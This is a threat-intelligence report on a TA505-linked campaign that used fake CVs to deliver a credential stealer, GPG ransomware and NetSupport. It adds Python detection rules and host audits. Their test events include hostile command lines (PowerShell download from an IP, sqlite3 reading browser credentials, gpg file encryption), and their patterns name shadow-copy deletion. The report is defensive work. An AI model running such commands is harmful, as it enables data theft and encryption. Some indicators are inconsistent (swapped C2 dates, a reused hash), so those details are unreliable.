The Curious Case of the Criminal Curriculum Vitae

19 March 2020

Executive Summary

The Tailored Intelligence Team at Prevailion has detected a new campaign—at least a facet of which is currently active—dubbed The Curious Case of the Criminal Curriculum Vitae.

In this newly discovered campaign, threat actors targeted German companies with trojanized emails disguised as job applicants. While this activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization.

Once the email attachment was activated, a company’s secure credentials and credit card data could be transmitted covertly to the threat actors. In the 2019 iterations of this attack, the attackers used commercial tools to encrypt all of the user’s files, which suggests this recent activity could also lay the groundwork for an infection vector into the company’s network to encrypt files.

A second cluster of activity used a more sophisticated approach. It fetched an instance of NetSupport, a commercial remote administration tool, hosted on a user’s Google Drive account. This enabled a host of actions, including remote file transfer, screen captures, and even voice recordings. Since these threat actors are abusing legitimate binaries such as GPG tools and NetSupport, they are unlikely to be removed by traditional antivirus software.

Based upon the overlap in infrastructure between these two clusters, we associate them with the same threat actor with high confidence. Upon further inspection of the second cluster’s samples, we were able to correlate it to known TA505 activity based upon the digital signature used to sign the binary.

Technical Details

Cluster 1 Activity

Threat actors have continued to rely upon business email compromise (BEC) to initially infect their victims. This technique is particularly hard to defend against when malicious emails mimic normal business interactions. In this particular case the threat actor impersonated a job applicant and attached a trojanized version of a Curriculum Vitae (CV). The sample below was then sent to the human resources departments of German-speaking businesses. All observed source email addresses in this case were created through

Image of the malicious email sent to victims in January 2020

The message above roughly translates to:

Dear Sirs and Madames,

I am enclosing my CV in tabular form.

For further questions I am gladly at your disposal.

Friendly greetings

Leon Jager

If the victim opened the CV file, lebensaluf_2020_1_7.iso, an embedded Microsoft shortcut (.lnk) file would run a PowerShell script on the newly infected host. The script begins by reaching out to a threat actor controlled IP address (hxxp://194.36.189[.]215/) to download two files: the first a copy of rar.exe, and the second a RAR-compressed archive named “dmnn.rar”. The first file, rar.exe, is a legitimate binary used to compress and decompress data files; in this case it is used to decompress the second file, “dmnn.rar”.

Once decompressed, the dmnn.rar file contained three files named:

  • Lebenslauf_2020_1_7.jpeg
  • Dmn.bat
  • Sqlite3.exe

The aforementioned lnk file would first display the image file “lebenslauf_2020_1_7.jpeg”, likely in an attempt to avoid suspicion among the victims.

Image of the Lebenslauf_2020_1_7.jpeg, as it would appear to victim

Next, the Microsoft .lnk file starts the “dmn.bat” file using PowerShell. This dmn.bat is rather large, so to make it easier to understand we describe it in three parts. The first part changes the active console code page to “Multilingual (Latin I)” so the code runs regardless of the environment’s locale configuration. This first segment then enumerates the host machine, determining:

  • the names of all programs installed on the machine,
  • the versions of those programs,
  • the dates the programs were installed,
  • the computer’s name,
  • the computer’s domain.

The script then generates a string of eight random characters, likely as a unique identifier for each workstation. If the computer name and domain are not the same, it sends that information, along with the unique identifier, to the threat actor controlled C2 located at the URI hxxp://194.36.189[.]215/firstga990.php

The second part of the script attempts to gather saved credentials, cookies, and credit cards. Specifically, it:

  • uses sqlite3.exe to obtain saved cookies, login data, and web data (such as credit card numbers) from Google Chrome,
  • attempts to grab saved login passwords and cookies from Thunderbird, Mozilla, and Edge applications,
  • kills all taskhost and dllhost processes,
  • enumerates and harvests Outlook credentials.

Image showing the process obtained saved information from Chrome browser

Once all the saved credentials have been obtained, the output is written into the “safsff3f” directory. That directory is then compressed using rar and renamed to the aforementioned unique identifier. The newly compressed file is then sent back to the threat actor controlled C2, specifically the URI “hxxp://194.36.189[.]215/ris.php”.

Lastly, it creates a scheduled task with the same name as the unique identifier. The task runs every minute, transmitting the unique identifier back to the C2, likely as a heartbeat beacon. Finally, the bat file deletes all the files it downloaded, created, and modified on the host machine. While this walkthrough covers the campaign that occurred on January 17th, 2020, we have observed these same techniques in use as far back as July 2019.

GPG Ransomware from June 2019 Strain

Once we analyzed the aforementioned samples, we discovered a similar rar file from June 2019 that included a ransomware component. Like the previous operations, this one began with a file named “Lebenslauf_2019_6_6.iso” which contained an embedded Microsoft .lnk file. This .lnk file is almost identical to the one from January 2020.

Images showing the lexicon similarities between the iso files

The Microsoft link file again obtains both a rar executable and a rar compressed folder. Once unpacked, this folder contained the following files:

  • Brg.brg, which contains a public 2048 bit RSA key
  • Brk.bat, a batch script to encrypt stored files
  • Sh.vbs, a Visual Basic script to delete all shadow copies as SYSTEM
  • Lebensaluaf_2019_6_6, an image file
  • Gpg.exe, GPG executable
  • Gpgconf.exe, support file for GPG tools
  • Libassuan-0.dll, support file for GPG tools
  • Libgcrypt-20.dll, support file for GPG tools
  • Libgpg-error-0.dll, support file for GPG tools
  • Libnpth-0.dll, support file for GPG tools
  • Libsqlite3-0.dll, support file for GPG tools
  • Zlib1.dll, support file for GPG tools

The main difference between the 2020 example and this 2019 strain was the inclusion of the GPG suite files. The batch file encrypts all the drives on the local machine using the public GPG key “brg.brg”. Next it compresses the files and sends some host based data to the email address

Image of the malicious batch file

It then displays the following message to the victim; please note this is a verbatim copy of the message:

“All important files and information on this comuter (documents, databases, etc.) will be decrypted using a RSA cryptographic algorithm”

“Without special software decoding a single file with the help of the most powerful computers will take about a 20 years.”

“contact an expert  on e-mail: or”

The Visual Basic script then deletes the shadow copies of the files as “system,” using Windows Management Instrumentation (WMI). The files that were in the compressed folder are deleted, and following that a web request is sent to the URI “hxxp://185.106.120[.]31/ok”.

During our investigation, we identified another folder with the ransomware strain, whose file names indicate it was from May 2019. This folder once again contained the GPG files and a public key used to encrypt all the local files. There were only a few small differences. The first is that the encryption routine was written in Visual Basic instead of as a batch file; in this sample, the batch file simply contained a short script to delete all the downloaded files. Despite the damage this compressed folder could cause, we noticed it had a relatively low detection rate.

Virustotal detection rate for compressed tog.rar file, containing GPG ransomware script

The second difference was the email addresses used to contact the threat actor: blklock{at} and hopionion123{at}. Anecdotally, we found a post on an ESET forum where a user in Germany claimed to have been victimized by this threat actor. We correlated these events based upon the same email address, blklock{at}, appearing in the ransomware message as the contact. While this first cluster of activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization looking to recruit new applicants.
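As an added illustration, not part of Prevailion’s report, the following Python rules encode the observable steps of both chains described above, the credential-theft batch file (dropped sqlite3.exe and rar.exe, every-minute scheduled task, PowerShell fetching from a bare IP) and the GPG ransomware variant (gpg.exe and a .vbs run from a user-writable directory, shadow-copy deletion), and run them over constructed process-creation events in the style of Sysmon event 1. The event fields, the rule names, the assumption that the every-minute task is created with schtasks.exe, and every sample command line and address (203.0.113.10 is a documentation address, not an indicator) are the example’s own; only the file names and behaviours come from the report.

```python
"""Detection rules for the two chains described above (credential theft via
dropped sqlite3.exe/rar.exe, and GPG-based file encryption), run over
constructed Sysmon-style process-creation events.  Example code added to this
page, not the report's; field names, rule names and sample values are assumed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str     # full path of the started executable
    cmdline: str   # its command line (script-block text may also be fed here)
    parent: str    # full path of the parent process


# Download from a bare IP literal, as the LNK-launched PowerShell stage does.
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I)
# Browser and mail-client credential stores the batch file hands to sqlite3.exe.
BROWSER_DBS = ("login data", "cookies", "web data",
               "logins.json", "cookies.sqlite", "key4.db")
# Where a dropped toolkit lives; GnuPG installed under Program Files is not matched.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def exe_name(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def in_user_writable(path: str) -> bool:
    return any(d in path.lower() for d in USER_WRITABLE)


def rule_powershell_ip_download(ev: ProcEvent) -> bool:
    return exe_name(ev.image) == "powershell.exe" and IP_URL.search(ev.cmdline) is not None


def rule_sqlite_browser_db(ev: ProcEvent) -> bool:
    c = ev.cmdline.lower()
    return exe_name(ev.image) == "sqlite3.exe" and any(db in c for db in BROWSER_DBS)


def rule_minute_heartbeat_task(ev: ProcEvent) -> bool:
    # A task re-armed every minute, the beacon described above (schtasks syntax assumed).
    c = ev.cmdline.lower()
    return (exe_name(ev.image) == "schtasks.exe" and "/create" in c
            and re.search(r"/sc\s+minute\b", c) is not None
            and re.search(r"/mo\s+1\b", c) is not None)


def rule_gpg_from_user_dir(ev: ProcEvent) -> bool:
    c = ev.cmdline.lower()
    return (exe_name(ev.image) == "gpg.exe" and in_user_writable(ev.image)
            and ("--encrypt" in c or re.search(r"\s-e\b", c) is not None))


def rule_script_from_user_dir(ev: ProcEvent) -> bool:
    c = ev.cmdline.lower()
    return (exe_name(ev.image) in ("wscript.exe", "cscript.exe")
            and ".vbs" in c and in_user_writable(c))


def rule_shadow_copy_delete(ev: ProcEvent) -> bool:
    # Needs script-block or WMI-activity text for the VBS case; see the note below.
    c = ev.cmdline.lower()
    return (("win32_shadowcopy" in c and "delete" in c)
            or ("vssadmin" in c and "delete shadows" in c))


RULES = [rule_powershell_ip_download, rule_sqlite_browser_db,
         rule_minute_heartbeat_task, rule_gpg_from_user_dir,
         rule_script_from_user_dir, rule_shadow_copy_delete]


def detect(events):
    """Return [(event_index, rule_name)] for every rule that fires."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


# Constructed sample events (203.0.113.10 is a documentation address, not an IoC).
TMP = r"C:\Users\hr\AppData\Local\Temp"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "iwr http://203.0.113.10/dmnn.rar -OutFile $env:TEMP\dmnn.rar"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(TMP + r"\dmnn\sqlite3.exe",
              r'sqlite3.exe "C:\Users\hr\AppData\Local\Google\Chrome\User Data\Default\Login Data"', CMD),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 1 /tn q8zk2m1p /tr "cmd /c q8zk2m1p.bat"', CMD),
    ProcEvent(TMP + r"\tog\gpg.exe",
              r"gpg.exe --batch --yes --trust-model always --encrypt -r brg D:\docs\report.xlsx", CMD),
    ProcEvent(r"C:\Windows\System32\wscript.exe", "wscript.exe " + TMP + r"\tog\sh.vbs", CMD),
    # Benign: installed GnuPG encrypting one file for a colleague; a daily backup task.
    ProcEvent(r"C:\Program Files (x86)\GnuPG\bin\gpg.exe",
              "gpg.exe --encrypt -r alice@example.com budget.xlsx", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"', CMD),
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Two design points matter in practice. The shadow-copy rule inspects text, so to see the WMI deletion performed by the VBS above it must be fed script-block or WMI-activity logging; a plain process-creation event for wscript.exe shows only the script path, which is why the script-from-user-directory rule exists alongside it. The GPG rule deliberately ignores Program Files, so an installed GnuPG encrypting one file for a colleague does not fire while a copy of gpg.exe running out of %TEMP% does.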

Cluster 2 – “REKT” and NetSupport Remote Admin Tool

Overlap with a Remote Administration Tool

Once we identified the C2 nodes that were used to host the malicious compressed rar files, we noticed that they also hosted executable files. In the recent campaign of February 2020, the threat actor used the C2 node 194.36.189[.]215 to host both the malicious rar archive and an executable named rrr.zzz on the same day, according to VirusTotal.

Virustotal screenshot with both the CV rar and the new sample being hosted on the same date

Upon further examination, the C2 used in the January campaign, 185.244.150[.]143, also hosted a variant of the same executable, “fnb.111”. Based upon the infrastructure overlap in two separate cases, we assess with high confidence that the same threat actors who were responsible for the “Curriculum Vitae” attack were associated with this new agent.

The Rekt Loader

Luckily one of the files, rrr.zzz, still had its debug strings, which aided our efforts to better understand the agent. For example, we were able to extract the following PDB path:

            “C:\\Users\\Андрей\\Desktop\\readme\\proj\\tst – копия\\Debug\\rekt.pdb”

This led us to believe that the threat actors named this particular loader “rekt” (not to be confused with the ransomware REKTlocker). The sample was written in C and C++ in Visual Studio 2017. The primary purpose of this loader is to download additional payloads. The samples contacted three unique URLs, all of which were hosted on Google Drive, using the following hard-coded user agent string to contact Google Drive:

            Mozilla / 5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
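A hard-coded user agent is a cheap hunting pivot for defenders, so here is an added example, not code from the report, that parses web proxy logs and flags requests carrying the legacy Internet Explorer agent quoted above when they go to Google Drive. The log layout, the list of Drive hostnames, the client addresses and the file ids are all constructed for the example; only the user agent string is taken from the report, and the match is tolerant of the extra spaces around “Mozilla / 5.0” in case that is a rendering artifact.

```python
"""Hunt for rekt-loader style retrievals in web proxy logs: the hard-coded
legacy Internet Explorer user agent quoted above fetching content from Google
Drive.  Example code added to this page, not the report's; the log layout,
the Drive host list and every sample line are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Distinctive tail of the user agent string reported above; tolerant of the
# extra spaces around "Mozilla / 5.0" that appear in some renderings.
REKT_UA = re.compile(r"MSIE 7\.0;\s*Windows NT 5\.1;\s*InfoPath\.1")
# Hosts that serve Google Drive file content (assumed list, extend as needed).
DRIVE_HOSTS = {"drive.google.com", "docs.google.com", "drive.usercontent.google.com"}

# Constructed log layout: time client method url status bytes "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"(?P<ua>[^"]*)"$')


def parse_line(line):
    """Return a dict of fields (plus 'host'), or None when the line does not parse."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = (urlsplit(rec["url"]).hostname or "").lower()
    return rec


def classify(rec):
    """Label one parsed record, or None when it looks ordinary."""
    legacy_ua = REKT_UA.search(rec["ua"]) is not None
    if legacy_ua and rec["host"] in DRIVE_HOSTS:
        return "rekt_ua_to_google_drive"
    if legacy_ua:
        return "legacy_msie_ua"   # an IE7/XP agent on a fleet that has neither is worth a look
    return None


def scan(lines):
    """Return ({client: [(url, label), ...]}, unparsed_line_count)."""
    findings = defaultdict(list)
    unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        label = classify(rec)
        if label:
            findings[rec["client"]].append((rec["url"], label))
    return dict(findings), unparsed


# Constructed sample log; the 10.20.30.0/24 clients and the file ids are invented.
SAMPLE_LOG = """\
2020-02-12T09:14:02Z 10.20.30.41 GET https://drive.google.com/uc?export=download&id=EXAMPLE1 200 1203 "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
2020-02-12T09:14:03Z 10.20.30.41 GET https://drive.google.com/uc?export=download&id=EXAMPLE2 200 418231 "Mozilla / 5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
2020-02-12T09:15:10Z 10.20.30.77 GET https://drive.google.com/file/d/EXAMPLE3/view 200 55213 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/80.0.3987.122"
2020-02-12T09:16:44Z 10.20.30.41 GET http://intranet.example/news 200 9001 "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
garbage line that does not parse
"""

if __name__ == "__main__":
    hits, unparsed = scan(SAMPLE_LOG.splitlines())
    for client, items in hits.items():
        for url, label in items:
            print(f"{client} {label} {url}")
    print(f"{unparsed} unparsed line(s)")
```

The second label, an IE7-on-XP agent anywhere, is the weaker signal but is useful on an estate where no such client exists: a browser that claims Windows NT 5.1 in 2020 is almost always a program with a baked-in string rather than a browser, and grouping by client address shows which host is carrying it.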

2nd Stage – NetSupport

Once the rekt loader contacted the three Google Drive URLs, it downloads the following files:

  • 7zip.exe, a benign program used to compress/decompress files
  • A batch file
  • A password-protected 7zip file

The rekt loader then runs the batch file, which uses the 7zip executable to decompress the archive, supplying the requisite password. Once decompressed, the files are placed in the “%APPDATA%” directory. Afterward, it adds a “Run” registry key for persistence to start “host.exe”; the registry key modified was HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Next, it starts the downloaded host.exe and, following completion, kills the rundll32.exe processes, changes the %TEMP% directory, and finally deletes the batch file and the 7zip executable.

Image of the batch file hosted on Google Drive

The host.exe file was identified as NetSupport, a commercially available remote desktop product. Since it is a commercial product, it is a signed Windows binary, making it unlikely to be flagged by antivirus products. While this tool, and those like it, are intended for use by authorized administrators and information technology staff, they can also be abused by nefarious actors. Once deployed, this tool provides the following capabilities:

  • remote file transfer,
  • geolocation of the infected machine,
  • screenshot capture,
  • remotely turning on the microphone to capture audio.

The only file that appeared to be modified by the threat actor was client32.ini, where the threat actors entered their own gateway address, hxxp://23.227.207[.]138:12233.
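Because a legitimate, signed NetSupport client will not be flagged by antivirus, the practical check is whether the deployment on a host looks like an administrator’s or like the pattern described above: a client32.ini whose gateway is not one the organization runs, a client living under %APPDATA%, and an HKCU Run entry launching it. The following Python audit, an added example rather than anything from the report or from NetSupport, does exactly that. It assumes the ini keeps its gateway in an [HTTP] section under GatewayAddress and Port keys (an assumption, not taken from the report), the approved-gateway list is hypothetical, and the sample ini, path and Run values are constructed; the known-bad gateway is the one reported above.

```python
"""Audit a Windows host for the NetSupport deployment pattern described above:
a client32.ini pointing at a gateway that is not approved, a client living in a
user-writable directory, and an HKCU Run entry that launches it.  Example code
added to this page, not the report's; the ini layout (an [HTTP] section with
GatewayAddress and Port keys), the approved-gateway list and the sample data
are assumptions.  The known-bad gateway is the one reported above."""
import configparser
import re

APPROVED_GATEWAYS = {"netsupport-gw.corp.example:443"}   # hypothetical org allowlist
KNOWN_BAD_GATEWAYS = {"23.227.207.138:12233"}            # gateway from the report above
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|users\\public)\\", re.I)


def gateway_from_ini(text):
    """Return 'address:port' from client32.ini, or '' when no gateway is configured."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("HTTP"):
        return ""
    addr = cp["HTTP"].get("GatewayAddress", "").strip()
    port = cp["HTTP"].get("Port", "").strip()
    return f"{addr}:{port}" if addr and port else addr


def audit_netsupport(ini_text, ini_path, run_entries):
    """run_entries maps HKCU Run value names to their commands.  Returns finding codes."""
    findings = []
    gateway = gateway_from_ini(ini_text)
    if gateway in KNOWN_BAD_GATEWAYS:
        findings.append("gateway_known_bad")
    elif gateway and gateway not in APPROVED_GATEWAYS:
        findings.append("gateway_not_approved")
    if USER_WRITABLE.search(ini_path):
        findings.append("client_in_user_writable_dir")
    # A Run value that starts anything from the directory holding this ini.
    client_dir = ini_path.rsplit("\\", 1)[0].lower()
    for name, cmd in run_entries.items():
        if client_dir and client_dir in cmd.lower():
            findings.append(f"run_key_launches_client:{name}")
    return findings


# Constructed sample data: a client dropped under %APPDATA% as described above.
SAMPLE_INI = """\
[HTTP]
GatewayAddress=23.227.207.138
Port=12233
SecondaryGateway=
"""
SAMPLE_INI_PATH = r"C:\Users\hr\AppData\Roaming\host\client32.ini"
SAMPLE_RUN = {   # constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values
    "OneDrive": r'"C:\Users\hr\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "host": r'"C:\Users\hr\AppData\Roaming\host\host.exe"',
}
# Constructed benign deployment: installed under Program Files, approved gateway.
BENIGN_INI = "[HTTP]\nGatewayAddress=netsupport-gw.corp.example\nPort=443\n"
BENIGN_INI_PATH = r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini"

if __name__ == "__main__":
    print("suspect:", audit_netsupport(SAMPLE_INI, SAMPLE_INI_PATH, SAMPLE_RUN))
    print("benign: ", audit_netsupport(BENIGN_INI, BENIGN_INI_PATH, {}))
```

On a live host the two inputs would come from reading every client32.ini found on disk and exporting the HKCU Run key for each user profile; the point of keeping the gateway allowlist explicit is that an unknown gateway is a finding even when it is not yet on any indicator list.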

Correlations to Prior Reporting

Once we identified the Rekt loader, we began to look for other variants of this sample. We identified an older variant from 2019, although we strongly suspect there are additional samples. The sample from April 2019 was hosted on a compromised domain, hxxp://juristlex[.]com/photo/photo88326635[.]scr. Our evaluation showed that it appeared to be very similar to the agent from 2020.

One big difference was that this particular sample was signed with a digital signature from “Allo’ Ltd”. The company named “Allo’ Ltd” appeared to be a convenience store, or bodega, in the United Kingdom that closed in 2018. Searching on the properties of that digital signature, we identified two “FlawedAmmyy” trojans. The digital signature used to sign those two FlawedAmmyy trojans was referenced in a report on TA505 activity released earlier this year by the South Korean FSI-Cert. Both the FlawedAmmyy signature and the one used on the 2019 rekt sample referenced the same company and the same address, and expired on the same day at the same time. All three hashes and the digital signature serial number can be found below in the IOC section. We assess it highly unlikely that another actor would impersonate the same organization to obtain a digital signature for binaries; therefore we correlate the Rekt agent and the C2 nodes used to host them to TA505 with moderate confidence.

Digital Signature for the 2019 Rekt sample on the left, FlawedAmmyy sample on the right

Operation overview showing overlap between campaigns

When we analyzed the TTPs associated with this second cluster of activity, we observed similarities to reports by both Palo Alto and FireEye. The strongest correlation was with the Palo Alto report, where they observed the NetSupport RAT being deployed and then communicating with a hard-coded IP address ending in “/fakeurl.hml”. The one difference was that they observed NetSupport being downloaded by a PowerSploit module, whereas we observed it being downloaded by the rekt loader. There were also some similarities between this campaign and a FireEye report, where they observed a threat actor using a benign version of 7zip and a batch file that contained a password to decompress a folder containing NetSupport. In the FireEye report, the victims were compromised by visiting watering-hole websites.

This entity has achieved a high level of success due to its ability to abuse legitimate binaries for nefarious purposes. Two examples of this are the use of GPG tools to encrypt all the files on a machine, and the use of a legitimate remote systems administration tool that already has all the functionality they need while reducing the risk of detection. Since the binary is signed, even if it is detected by an antivirus engine it has great potential to be mistakenly ignored as software that was intentionally installed by the network administrator.

In order to protect against TA505 and BEC in general, we recommend using an email security solution. End users should regularly update their antivirus product of choice, particularly on high-risk users who are opening files from untrusted sources. In order to protect a corporate environment against ransomware attacks, the corporate network should be segmented to impede attackers’ ability to spread laterally once they gain access. Strong passwords should be used for all corporate accounts, along with a password manager. For guidance on how to create strong passwords, click here.

Prevailion has shared our findings, including file samples and indicators of compromise, in this report with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit

Indicators of Compromise

Cluster 1 Activity – 2020 Strain

Campaign 0

Rar.exe: 5a0898b193b27b8b962c9519d756f0631b62a6a0658a676ffc84744edbff0e10

Campaign 1

Campaign 2


Campaign 3

Campaign 4

Campaign 5

Campaign 6

Campaign 7

Ransomware Strain

Campaign 8

Campaign 9

Trkop.vbs: 101f060edf89f4362ee6657acc110f88d3140090fb676620049a2407b503b837

yin1abtn.cq124aqq: cca91cc9bcf32f8bd9e2dddd0c001b4b4c4a83b812d4b30512fcb40f09b07403

Rekt and NetSupport

January Campaign

ITW URL: hxxp://194.36.189[.]215/fnb.111

File name: fnb.111

Contacted URLs

(The order of the hashes corresponds to the order URLs listed above)

NetSupport Zipped file: 4804edbbb8275cd465d7c1c520f97a1a5007f6234d4562a3ae9ed01110b429ce

Bat file: 0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe

7z.exe (benign): c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)

February Campaign

ITW URL: hxxp://185.244.150[.]143/rrr.zzz

File name: rrr.zzz

Contacted URLs

(The order of the hashes corresponds to the order URLs listed above)

Bat file: 30bcc93e492c88032dd058c413e49c6cffa446f13d0311d5fb8980dbd923746b

NetSupport Zipped file: 0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe

7z.exe (benign): c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)

2019 Rekt Sample

File name: photo88326635.scr

Digital Signature serial number: 75 DF 42 48 6D A0 6F 02 65 BE 10 98 04 D9 FB 13

Email address associated within digital signature: vanya.tanichew{at}

Contacted URLs

FlawedAmmyy samples that shared the digital certificate properties

Digital Signature Serial number: 00 F4 24 13 EE 41 08 72 60 A5 07 6D DA F1 C0 76 C5

Copyright 2023 Prevailion, Inc. All rights reserved.
